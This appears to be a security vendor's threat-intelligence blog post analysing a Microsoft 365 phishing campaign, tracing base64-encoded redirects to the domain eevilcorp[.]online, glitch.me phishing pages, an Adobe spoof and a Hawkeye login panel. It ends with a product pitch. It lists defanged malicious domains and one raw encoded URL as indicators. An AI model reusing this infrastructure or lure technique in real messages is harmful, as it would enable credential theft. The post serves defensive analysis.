M365 Phishing Email Analysis – eevilcorp
July 06, 2023—
2 min read
Vade’s Threat Intelligence and Response Center (TIRC) has detected a new Microsoft 365 phishing attack. The TIRC analyzed an email containing a malicious HTML attachment.
In this post, we examine the TIRC’s phishing email analysis and review measures to stay protected.
Phishing email analysis: evilcorp.online
We decoded the base64 encoded string:
Input: aHR0cHM6Ly9lZXZpbGNvcnAub25saW5lL2dlbmVyYXRvcj90YWJsZT0xMCZtZW1lPUYtMDA wNjAmcGVlcj15b3VuZ19tdWx0aXBsZQ==
Output (defanged): hxxps[://]eevilcorp[.]online/generator?table=10&meme=F-00060&peer=young_multiple
Once decoded, we discovered a malicious domain, eevilcorp[.]online.
We found results for related Microsoft 365 phishing attacks online, in which requests to eevilcorp[.]online were made for the phishing applications.
Unknown phishers have leveraged the platform glitch.me to host malicious HTML pages.
Microsoft 365 phishing page - hxxps[://]periodic-checker[.]glitch[.]me
The source code of the page from periodic-checker[.]glitch[.]me is similar to the one from the HTML file in attachment.
Using this source code, we decoded the base64 encoded string:
Output (defanged): hxxps[://]eevilcorp[.]online/generator?table=4&meme=L-00057&peer=gbm_office
[Related Content]: Cyberthreat Analysis: ‘Greatness’ Phishing-as-a-Service (PhaaS)
We found another phishing attack spoofing Adobe:
Adobe phishing page
We decoded the base64 encoded strings:
Output (defanged): hxxps[://]ultimotempore[.]online/services/petayor[.]php
The second base64 string is longer and we retrieved the domain eevilcorp[.]online, used to collect the IP address of the victim at the opening of the trapped page.
The ouput from eevilcorp[.]online/activity/open was a JSON object.
On Joe Sandbox, we found the scan result, Paystub-382023.html, related to another phishing attack associated with eevilcorp[.]online.
Phishing page spoofing Microsoft - Paystub-382023.html
Analysis overview - edge_driver.js
VirusTotal - edge_driver.js details
According to several online reports, the file edge_driver.js would be related to a browser adware/hijacker Edge Shopping. Below a list of related files:
We suppose that miscellaneous malware could be distributed/dropped from an HTML page like Paystub-382023.html.
What does the authentication form Hawkeye mean?
The page returned by the malicious domain eevilcorp[.]online is an authentication page related to an application named Hawkeye.
Authentication form – Hawkeye
As reported by several cybersecurity actors like Talos, the original HawkEye Keylogger is a malware kit whose story began in 2013. Because several versions were introduced, we don’t know if the authentication page above is related to HawkEye Keylogger.
HawkEye Keylogger logos
HawkEye PHP Logger (2014)
Phishing email analysis - indicators of compromise (IoCs)
Below are important indicators of compromise (IoCs) related to the phishing email analysis.
Takeaways from M365 phishing email analysis
Phishing remains a top threat and the #1 method of distributing malware, including ransomware. Protecting your organization from compromise calls for adopting user awareness training that teaches employees how to spot and handle phishing threats. It also requires reinforcing your Microsoft 365 email security with integrated protection from a third-party solution.
Vade for M365 is a collaborative email security solution for Microsoft 365 powered by AI and enhanced by people. In addition to robust incident response and advanced threat detection capabilities, it offers automated phishing awareness training that is personalized and administered whenever users encounter a phishing threat.